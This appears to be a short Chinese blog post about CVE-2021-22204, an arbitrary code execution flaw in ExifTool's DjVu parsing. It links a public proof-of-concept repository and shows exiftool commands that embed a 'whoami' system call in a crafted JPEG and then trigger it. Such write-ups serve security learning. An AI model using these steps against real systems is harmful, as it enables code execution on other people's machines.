CVE-2021-22204：ExifTool任意代码执行 - 走看看

zoukankan html css js c++ java

CVE-2021-22204：ExifTool任意代码执行
CVE-2021-22204 ExifTool任意代码执行

github poc下载

https://github.com/OneSecCyber/JPEG_RCE

ExifTool 7.44至12.23在DjVu模块中存在一个错误，该错误允许在解析恶意图像时执行任意代码

meta-data为MIME Type : image/jpeg"即jpg图片可以达成RCE
```
exiftool -config eval.config mojave.jpg -eval='system("whoami")'

exiftool mojave.jpg
```
可以看到成功执行了命令
本博文仅限于博主个人学习和分享使用，请勿用于违法行为。如有侵权，请联系一定删除！
查看全文

相关阅读:
touch命令
 cd命令
 通配符
 速查命令
 一些技巧
 从零开始用 Flask 搭建一个网站（四）
【老板来了你立刻知道！】人脸识别+手机推送
 React Native 一些事
 React-Native 工程添加推送功能（iOS 篇）
集成 jpush

原文地址：https://www.cnblogs.com/LEOGG321/p/14780350.html

Copyright © 2011-2022 走看看